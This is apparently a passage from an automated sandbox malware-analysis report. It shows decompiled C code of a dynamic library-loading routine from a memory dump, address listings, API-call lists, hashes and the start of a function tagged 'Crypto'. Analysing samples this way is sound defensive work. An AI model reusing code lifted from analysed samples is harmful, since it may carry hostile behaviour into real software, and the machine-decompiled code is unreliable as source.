											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(3);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x7376305c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x818) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x828) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E73761A36( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
												_t136 = _v16 + 0x41; // 0x41
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x830)) = 0;
												 *((intOrPtr*)(__edi + 0x82c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x82c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x830; // 0x830
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t271 = _t268 - 1;
								__eflags = _t271;
								if(_t271 == 0) {
									_v16 = _t282;
									goto L80;
								}
								__eflags = _t271 != 1;
								if(_t271 != 1) {
									goto L162;
								}
								__eflags = _t285 - 0x6e;
								if(__eflags > 0) {
									_t308 = _t285 - 0x72;
									__eflags = _t308;
									if(_t308 == 0) {
										_push(4);
										L74:
										_pop(_t273);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t329 + 0x810;
											 *_t96 =  *(_t329 + 0x810) &  !_t273;
											__eflags =  *_t96;
										} else {
											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
										}
										_v8 = 1;
										goto L57;
									}
									_t311 = _t308 - 1;
									__eflags = _t311;
									if(_t311 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t311 != 0;
									if(_t311 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t314 = _t285 - 0x21;
								__eflags = _t314;
								if(_t314 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t315 = _t314 - 0x11;
								__eflags = _t315;
								if(_t315 == 0) {
									_t273 = 0x100;
									goto L75;
								}
								_t316 = _t315 - 0x31;
								__eflags = _t316;
								if(_t316 == 0) {
									_t273 = 1;
									goto L75;
								}
								__eflags = _t316 != 0;
								if(_t316 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t282;
								_v36 = _t282;
								goto L20;
							}
						}
						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
						if( *((char*)(_t320 - 1)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t282;
						if(_v32 == _t282) {
							goto L43;
						}
						goto L17;
					}
					_t276 = _t257 - 5;
					if(_t276 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t282;
							_v20 = _t282;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t282;
							goto L20;
						}
					}
					_t280 = _t276 - 1;
					if(_t280 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t282;
							_v20 = _t282;
							goto L20;
						}
					}
					if(_t280 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
					L182:
					return _t329;
				} else {
					_t224 =  *_t329 - 1;
					if(_t224 == 0) {
						_t187 = _t329 + 8; // 0x8
						_t323 = _t187;
						__eflags =  *_t323;
						if( *_t323 != 0) {
							_t225 = GetModuleHandleA(_t323);
							__eflags = _t225 - _t282;
							 *(_t329 + 0x808) = _t225;
							if(_t225 != _t282) {
								L171:
								_t192 = _t329 + 0x408; // 0x408
								_t324 = _t192;
								_t226 = E737615C2( *(_t329 + 0x808), _t324);
								__eflags = _t226 - _t282;
								 *(_t329 + 0x80c) = _t226;
								if(_t226 == _t282) {
									__eflags =  *_t324 - 0x23;
									if( *_t324 == 0x23) {
										_t195 = _t329 + 0x409; // 0x409
										_t230 = E737612FE(_t195);
										__eflags = _t230 - _t282;
										if(_t230 != _t282) {
											__eflags = _t230 & 0xffff0000;
											if((_t230 & 0xffff0000) == 0) {
												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t282;
								if(_v52 != _t282) {
									L178:
									_t324[lstrlenA(_t324)] = 0x41;
									_t228 = E737615C2( *(_t329 + 0x808), _t324);
									__eflags = _t228 - _t282;
									if(_t228 != _t282) {
										L166:
										 *(_t329 + 0x80c) = _t228;
										goto L182;
									}
									__eflags =  *(_t329 + 0x80c) - _t282;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t205 = _t329 + 4;
									 *_t205 =  *(_t329 + 4) | 0xffffffff;
									__eflags =  *_t205;
									goto L182;
								} else {
									__eflags =  *(_t329 + 0x80c) - _t282;
									if( *(_t329 + 0x80c) != _t282) {
										goto L182;
									}
									goto L178;
								}
							}
							_t233 = LoadLibraryA(_t323);
							__eflags = _t233 - _t282;
							 *(_t329 + 0x808) = _t233;
							if(_t233 == _t282) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t329 + 0x408; // 0x408
						_t235 = E737612FE(_t188);
						 *(_t329 + 0x80c) = _t235;
						__eflags = _t235 - _t282;
						goto L180;
					}
					_t236 = _t224 - 1;
					if(_t236 == 0) {
						_t185 = _t329 + 0x408; // 0x408
						_t237 = _t185;
						__eflags =  *_t237;
						if( *_t237 == 0) {
							goto L182;
						}
						_t228 = E737612FE(_t237);
						L165:
						goto L166;
					}
					if(_t236 != 1) {
						goto L182;
					}
					_t81 = _t329 + 8; // 0x8
					_t283 = _t81;
					_t325 = E737612FE(_t81);
					 *(_t329 + 0x808) = _t325;
					if(_t325 == 0) {
						goto L181;
					}
					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x850)) = E73761224(_t283);
					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x848)) = 1;
					 *((intOrPtr*)(_t329 + 0x838)) = 1;
					_t90 = _t329 + 0x408; // 0x408
					_t228 =  *(_t325->i + E737612FE(_t90) * 4);
					goto L165;
				}
			}



































































                                                                                        0x73761aa0
                                                                                        0x73761aa3
                                                                                        0x73761aa6
                                                                                        0x73761aa9
                                                                                        0x73761aac
                                                                                        0x73761aaf
                                                                                        0x73761ab2
                                                                                        0x73761ab4
                                                                                        0x73761ab7
                                                                                        0x73761aba
                                                                                        0x73761abf
                                                                                        0x73761ac2
                                                                                        0x73761aca
                                                                                        0x73761ad2
                                                                                        0x73761ad4
                                                                                        0x73761ad7
                                                                                        0x73761adf
                                                                                        0x73761adf
                                                                                        0x73761ae4
                                                                                        0x73761ae7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761af1
                                                                                        0x73761af3
                                                                                        0x73761af8
                                                                                        0x73761afa
                                                                                        0x73761b8b
                                                                                        0x73761b8b
                                                                                        0x73761b8b
                                                                                        0x73761b8f
                                                                                        0x73761b92
                                                                                        0x73761b94
                                                                                        0x73761bb6
                                                                                        0x73761bb9
                                                                                        0x73761bbb
                                                                                        0x73761bc4
                                                                                        0x73761bca
                                                                                        0x73761bcc
                                                                                        0x73761bd2
                                                                                        0x73761bd2
                                                                                        0x73761bd8
                                                                                        0x73761bdb
                                                                                        0x73761bdb
                                                                                        0x73761bde
                                                                                        0x73761bde
                                                                                        0x73761be4
                                                                                        0x73761be6
                                                                                        0x73761be9
                                                                                        0x73761bef
                                                                                        0x73761bf2
                                                                                        0x73761bf2
                                                                                        0x73761bf4
                                                                                        0x73761bfa
                                                                                        0x73761bfd
                                                                                        0x73761c21
                                                                                        0x73761c24
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761c27
                                                                                        0x73761c29
                                                                                        0x73761c37
                                                                                        0x73761c3a
                                                                                        0x73761c3c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761c3e
                                                                                        0x73761c3e
                                                                                        0x73761c3e
                                                                                        0x73761c44
                                                                                        0x73761c46
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761c48
                                                                                        0x73761c4a
                                                                                        0x73761c4c
                                                                                        0x73761c4e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761c4e
                                                                                        0x73761c50
                                                                                        0x73761c52
                                                                                        0x73761c54
                                                                                        0x73761c54
                                                                                        0x73761c5a
                                                                                        0x73761c60
                                                                                        0x73761c62
                                                                                        0x73761c76
                                                                                        0x73761c76
                                                                                        0x73761c78
                                                                                        0x73761c64
                                                                                        0x73761c6a
                                                                                        0x73761c6d
                                                                                        0x73761c6d
                                                                                        0x00000000
                                                                                        0x73761bff
                                                                                        0x73761bff
                                                                                        0x73761bff
                                                                                        0x73761c00
                                                                                        0x73761c08
                                                                                        0x73761c0c
                                                                                        0x73761c12
                                                                                        0x73761c16
                                                                                        0x00000000
                                                                                        0x73761c16
                                                                                        0x73761c02
                                                                                        0x73761c02
                                                                                        0x73761c03
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761c05
                                                                                        0x73761c06
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761c06
                                                                                        0x73761b96
                                                                                        0x73761b97
                                                                                        0x73761ba0
                                                                                        0x73761ba3
                                                                                        0x73761bb0
                                                                                        0x73761bb0
                                                                                        0x73761ba5
                                                                                        0x73761ba5
                                                                                        0x73761c7e
                                                                                        0x73761c81
                                                                                        0x73761c84
                                                                                        0x73761cf6
                                                                                        0x73761cfa
                                                                                        0x73761adc
                                                                                        0x00000000
                                                                                        0x73761adc
                                                                                        0x00000000
                                                                                        0x73761cfa
                                                                                        0x73761b94
                                                                                        0x73761b00
                                                                                        0x73761b03
                                                                                        0x73761b66
                                                                                        0x73761b69
                                                                                        0x73761b7a
                                                                                        0x73761b7a
                                                                                        0x73761b7d
                                                                                        0x73761c89
                                                                                        0x73761c8c
                                                                                        0x73761c8c
                                                                                        0x73761c8e
                                                                                        0x73762033
                                                                                        0x73762045
                                                                                        0x73762045
                                                                                        0x73762047
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73762037
                                                                                        0x73762038
                                                                                        0x7376203b
                                                                                        0x7376203e
                                                                                        0x737620ba
                                                                                        0x737620c1
                                                                                        0x737620c6
                                                                                        0x737620c9
                                                                                        0x73761cf2
                                                                                        0x73761cf2
                                                                                        0x73761cf2
                                                                                        0x73761cf3
                                                                                        0x00000000
                                                                                        0x73761cf3
                                                                                        0x73762040
                                                                                        0x73762042
                                                                                        0x73762042
                                                                                        0x73762049
                                                                                        0x7376204b
                                                                                        0x737620ae
                                                                                        0x73761ce7
                                                                                        0x73761cea
                                                                                        0x73761ced
                                                                                        0x73761cf0
                                                                                        0x73761cf0
                                                                                        0x00000000
                                                                                        0x73761cf0
                                                                                        0x7376204d
                                                                                        0x7376204f
                                                                                        0x73762055
                                                                                        0x73762055
                                                                                        0x73762057
                                                                                        0x7376205a
                                                                                        0x7376206d
                                                                                        0x7376206d
                                                                                        0x73762070
                                                                                        0x73762073
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73762075
                                                                                        0x73762078
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7376207a
                                                                                        0x73762081
                                                                                        0x73762081
                                                                                        0x73762087
                                                                                        0x7376208a
                                                                                        0x737620a6
                                                                                        0x7376208c
                                                                                        0x73762095
                                                                                        0x73762098
                                                                                        0x73762098
                                                                                        0x00000000
                                                                                        0x7376208a
                                                                                        0x7376205c
                                                                                        0x7376205f
                                                                                        0x73762062
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73762064
                                                                                        0x00000000
                                                                                        0x73762064
                                                                                        0x73762051
                                                                                        0x73762053
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73762053
                                                                                        0x73761c94
                                                                                        0x73761c94
                                                                                        0x73761c95
                                                                                        0x73761dde
                                                                                        0x73761dde
                                                                                        0x73761de5
                                                                                        0x73761de8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761df5
                                                                                        0x00000000
                                                                                        0x73761fdb
                                                                                        0x73761fde
                                                                                        0x73761fe1
                                                                                        0x73761fe1
                                                                                        0x73761fe2
                                                                                        0x73761fe5
                                                                                        0x73761fe7
                                                                                        0x73761fe9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761feb
                                                                                        0x73761feb
                                                                                        0x73761fee
                                                                                        0x73762000
                                                                                        0x73762003
                                                                                        0x73762006
                                                                                        0x7376200c
                                                                                        0x00000000
                                                                                        0x7376200c
                                                                                        0x73761ff0
                                                                                        0x73761ff0
                                                                                        0x73761ff2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761ff4
                                                                                        0x73761ff6
                                                                                        0x73761ff8
                                                                                        0x73761ff8
                                                                                        0x73761ff8
                                                                                        0x73761ff9
                                                                                        0x73761ffb
                                                                                        0x73761ffd
                                                                                        0x73761fe1
                                                                                        0x73761fe2
                                                                                        0x73761fe5
                                                                                        0x73761fe7
                                                                                        0x73761fe9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761fe9
                                                                                        0x00000000
                                                                                        0x73761e3c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761e48
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761e2f
                                                                                        0x73761e33
                                                                                        0x73761e37
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761fad
                                                                                        0x73761fb1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761fb7
                                                                                        0x73761fbf
                                                                                        0x73761fc6
                                                                                        0x73761fce
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f15
                                                                                        0x73761f15
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761e51
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7376202b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f1d
                                                                                        0x73761f1f
                                                                                        0x73761f1f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7376201b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7376201f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73762027
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f64
                                                                                        0x73761f66
                                                                                        0x73761f66
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f2f
                                                                                        0x73761f31
                                                                                        0x73761f31
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f41
                                                                                        0x73761f43
                                                                                        0x73761f43
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f72
                                                                                        0x73761f74
                                                                                        0x73761f74
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f4c
                                                                                        0x73761f4e
                                                                                        0x73761f4e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f53
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73762023
                                                                                        0x7376202d
                                                                                        0x7376202d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f7d
                                                                                        0x73761f81
                                                                                        0x73761f86
                                                                                        0x73761f89
                                                                                        0x73761f8a
                                                                                        0x73761f8d
                                                                                        0x73761f93
                                                                                        0x73761f93
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73762013
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f57
                                                                                        0x73761f57
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761e58
                                                                                        0x73761e58
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f6b
                                                                                        0x73761f6d
                                                                                        0x73761f6d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761dfc
                                                                                        0x73761e02
                                                                                        0x73761e05
                                                                                        0x73761e07
                                                                                        0x73761e07
                                                                                        0x73761e0a
                                                                                        0x73761e0e
                                                                                        0x73761e1b
                                                                                        0x73761e1d
                                                                                        0x73761e23
                                                                                        0x73761e23
                                                                                        0x73761e23
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f20
                                                                                        0x73761f20
                                                                                        0x73761f22
                                                                                        0x73761f29
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f67
                                                                                        0x73761f67
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f32
                                                                                        0x73761f32
                                                                                        0x73761f34
                                                                                        0x73761f3b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f44
                                                                                        0x73761f44
                                                                                        0x73761f46
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f75
                                                                                        0x73761f75
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f4f
                                                                                        0x73761f4f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f9b
                                                                                        0x73761f9f
                                                                                        0x73761fa4
                                                                                        0x73761fa7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f59
                                                                                        0x73761f59
                                                                                        0x73761f5c
                                                                                        0x73761f5e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761f6e
                                                                                        0x73761f6e
                                                                                        0x73761f77
                                                                                        0x73761f77
                                                                                        0x73761e5a
                                                                                        0x73761e5a
                                                                                        0x73761e5d
                                                                                        0x73761e64
                                                                                        0x73761e66
                                                                                        0x73761e68
                                                                                        0x73761e6f
                                                                                        0x73761e72
                                                                                        0x73761e77
                                                                                        0x73761e79
                                                                                        0x73761e7b
                                                                                        0x73761e7f
                                                                                        0x73761e85
                                                                                        0x73761e8b
                                                                                        0x73761e8b
                                                                                        0x73761e8d
                                                                                        0x73761e8d
                                                                                        0x73761e8e
                                                                                        0x73761e8e
                                                                                        0x73761e92
                                                                                        0x73761e98
                                                                                        0x73761e9a
                                                                                        0x73761e9e
                                                                                        0x73761ea3
                                                                                        0x73761ea3
                                                                                        0x73761ea5
                                                                                        0x73761ea5
                                                                                        0x73761ea8
                                                                                        0x73761eab
                                                                                        0x73761eb4
                                                                                        0x73761eb7
                                                                                        0x73761eba
                                                                                        0x73761eba
                                                                                        0x73761ebc
                                                                                        0x73761ebf
                                                                                        0x73761ec5
                                                                                        0x73761ecb
                                                                                        0x73761ecb
                                                                                        0x73761ecd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761ed3
                                                                                        0x73761ed3
                                                                                        0x73761ed7
                                                                                        0x73761ede
                                                                                        0x73761f02
                                                                                        0x73761f02
                                                                                        0x73761f06
                                                                                        0x73761f08
                                                                                        0x73761f0b
                                                                                        0x73761f0b
                                                                                        0x73761f0e
                                                                                        0x73761f0e
                                                                                        0x00000000
                                                                                        0x73761f06
                                                                                        0x73761ee3
                                                                                        0x73761ee6
                                                                                        0x73761ee6
                                                                                        0x73761eed
                                                                                        0x73761eef
                                                                                        0x73761ef2
                                                                                        0x73761ef9
                                                                                        0x73761efa
                                                                                        0x73761f00
                                                                                        0x73761f00
                                                                                        0x00000000
                                                                                        0x73761f00
                                                                                        0x73761ef4
                                                                                        0x73761ef7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761ef7
                                                                                        0x73761e87
                                                                                        0x73761e89
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761df5
                                                                                        0x73761c9b
                                                                                        0x73761c9b
                                                                                        0x73761c9c
                                                                                        0x73761ddb
                                                                                        0x00000000
                                                                                        0x73761ddb
                                                                                        0x73761ca2
                                                                                        0x73761ca3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761ca9
                                                                                        0x73761cac
                                                                                        0x73761da0
                                                                                        0x73761da0
                                                                                        0x73761da3
                                                                                        0x73761db8
                                                                                        0x73761dba
                                                                                        0x73761dba
                                                                                        0x73761dbb
                                                                                        0x73761dbe
                                                                                        0x73761dc1
                                                                                        0x73761dcd
                                                                                        0x73761dcd
                                                                                        0x73761dcd
                                                                                        0x73761dc3
                                                                                        0x73761dc3
                                                                                        0x73761dc3
                                                                                        0x73761dd3
                                                                                        0x00000000
                                                                                        0x73761dd3
                                                                                        0x73761da5
                                                                                        0x73761da5
                                                                                        0x73761da6
                                                                                        0x73761db4
                                                                                        0x00000000
                                                                                        0x73761db4
                                                                                        0x73761da9
                                                                                        0x73761daa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761db0
                                                                                        0x00000000
                                                                                        0x73761db0
                                                                                        0x73761cb2
                                                                                        0x73761d9c
                                                                                        0x00000000
                                                                                        0x73761d9c
                                                                                        0x73761cb8
                                                                                        0x73761cb8
                                                                                        0x73761cbb
                                                                                        0x73761ce4
                                                                                        0x00000000
                                                                                        0x73761ce4
                                                                                        0x73761cbd
                                                                                        0x73761cbd
                                                                                        0x73761cc0
                                                                                        0x73761cda
                                                                                        0x00000000
                                                                                        0x73761cda
                                                                                        0x73761cc2
                                                                                        0x73761cc2
                                                                                        0x73761cc5
                                                                                        0x73761cd4
                                                                                        0x00000000
                                                                                        0x73761cd4
                                                                                        0x73761cc8
                                                                                        0x73761cc9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761ccb
                                                                                        0x00000000
                                                                                        0x73761b83
                                                                                        0x73761b83
                                                                                        0x73761b86
                                                                                        0x00000000
                                                                                        0x73761b86
                                                                                        0x73761b7d
                                                                                        0x73761b6b
                                                                                        0x73761b6f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761b71
                                                                                        0x73761b74
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761b74
                                                                                        0x73761b05
                                                                                        0x73761b08
                                                                                        0x73761b3e
                                                                                        0x73761b41
                                                                                        0x00000000
                                                                                        0x73761b47
                                                                                        0x73761b49
                                                                                        0x73761b4d
                                                                                        0x73761b54
                                                                                        0x73761b5b
                                                                                        0x73761b5e
                                                                                        0x73761b61
                                                                                        0x00000000
                                                                                        0x73761b61
                                                                                        0x73761b41
                                                                                        0x73761b0a
                                                                                        0x73761b0b
                                                                                        0x73761b26
                                                                                        0x73761b29
                                                                                        0x00000000
                                                                                        0x73761b2f
                                                                                        0x73761b2f
                                                                                        0x73761b36
                                                                                        0x73761b39
                                                                                        0x00000000
                                                                                        0x73761b39
                                                                                        0x73761b29
                                                                                        0x73761b10
                                                                                        0x00000000
                                                                                        0x73761b16
                                                                                        0x73761b16
                                                                                        0x73761b1d
                                                                                        0x00000000
                                                                                        0x73761b1d
                                                                                        0x73761b10
                                                                                        0x73761d09
                                                                                        0x73761d0e
                                                                                        0x73761d13
                                                                                        0x73761d17
                                                                                        0x737621c6
                                                                                        0x737621cc
                                                                                        0x73761d29
                                                                                        0x73761d2b
                                                                                        0x73761d2c
                                                                                        0x737620f1
                                                                                        0x737620f1
                                                                                        0x737620f4
                                                                                        0x737620f7
                                                                                        0x73762114
                                                                                        0x7376211a
                                                                                        0x7376211c
                                                                                        0x73762122
                                                                                        0x73762139
                                                                                        0x73762139
                                                                                        0x73762139
                                                                                        0x73762146
                                                                                        0x7376214c
                                                                                        0x7376214f
                                                                                        0x73762155
                                                                                        0x73762157
                                                                                        0x7376215a
                                                                                        0x7376215c
                                                                                        0x73762163
                                                                                        0x73762168
                                                                                        0x7376216b
                                                                                        0x7376216d
                                                                                        0x73762172
                                                                                        0x73762184
                                                                                        0x73762184
                                                                                        0x73762172
                                                                                        0x7376216b
                                                                                        0x7376215a
                                                                                        0x7376218a
                                                                                        0x7376218d
                                                                                        0x73762197
                                                                                        0x7376219f
                                                                                        0x737621ab
                                                                                        0x737621b1
                                                                                        0x737621b4
                                                                                        0x737620e6
                                                                                        0x737620e6
                                                                                        0x00000000
                                                                                        0x737620e6
                                                                                        0x737621ba
                                                                                        0x737621c0
                                                                                        0x737621c0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x737621c2
                                                                                        0x737621c2
                                                                                        0x737621c2
                                                                                        0x737621c2
                                                                                        0x00000000
                                                                                        0x7376218f
                                                                                        0x7376218f
                                                                                        0x73762195
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73762195
                                                                                        0x7376218d
                                                                                        0x73762125
                                                                                        0x7376212b
                                                                                        0x7376212d
                                                                                        0x73762133
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73762133
                                                                                        0x737620f9
                                                                                        0x73762100
                                                                                        0x73762106
                                                                                        0x7376210c
                                                                                        0x00000000
                                                                                        0x7376210c
                                                                                        0x73761d32
                                                                                        0x73761d33
                                                                                        0x737620d0
                                                                                        0x737620d0
                                                                                        0x737620d6
                                                                                        0x737620d9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x737620e0
                                                                                        0x737620e5
                                                                                        0x00000000
                                                                                        0x737620e5
                                                                                        0x73761d3a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761d40
                                                                                        0x73761d40
                                                                                        0x73761d49
                                                                                        0x73761d4e
                                                                                        0x73761d54
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73761d5a
                                                                                        0x73761d67
                                                                                        0x73761d6d
                                                                                        0x73761d77
                                                                                        0x73761d7d
                                                                                        0x73761d85
                                                                                        0x73761d95
                                                                                        0x00000000
                                                                                        0x73761d95

                                                                                        APIs
                                                                                          • Part of subcall function 73761215: GlobalAlloc.KERNELBASE(00000040,73761233,?,737612CF,-7376404B,737611AB,-000000A0), ref: 7376121D
                                                                                        • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 73761BC4
                                                                                        • lstrcpyA.KERNEL32(00000008,?), ref: 73761C0C
                                                                                        • lstrcpyA.KERNEL32(00000408,?), ref: 73761C16
                                                                                        • GlobalFree.KERNEL32 ref: 73761C29
                                                                                        • GlobalFree.KERNEL32 ref: 73761D09
                                                                                        • GlobalFree.KERNEL32 ref: 73761D0E
                                                                                        • GlobalFree.KERNEL32 ref: 73761D13
                                                                                        • GlobalFree.KERNEL32 ref: 73761EFA
                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 73762098
                                                                                        • GetModuleHandleA.KERNEL32(00000008), ref: 73762114
                                                                                        • LoadLibraryA.KERNEL32(00000008), ref: 73762125
                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 7376217E
                                                                                        • lstrlenA.KERNEL32(00000408), ref: 73762198
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.213558284.0000000073761000.00000020.00020000.sdmp, Offset: 73760000, based on PE: true
                                                                                        • Associated: 00000000.00000002.213546803.0000000073760000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213566406.0000000073763000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213570908.0000000073765000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 245916457-0
                                                                                        • Opcode ID: 5d69414e3d7db040ea45fc218cb17c5ac691cfc594774769280402e2ada90ed7
                                                                                        • Instruction ID: 5d12216ccb2246b8e5f15e991dd17c2fb437d294441ab4754160c0af31a70e6b
                                                                                        • Opcode Fuzzy Hash: 5d69414e3d7db040ea45fc218cb17c5ac691cfc594774769280402e2ada90ed7
                                                                                        • Instruction Fuzzy Hash: 5722D971D0460ADFDB52CFA4C9A83EDBBF9FB04301F14852ED996A3280DB748681DB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406131, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 98%
                                                                                        			E00406131() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
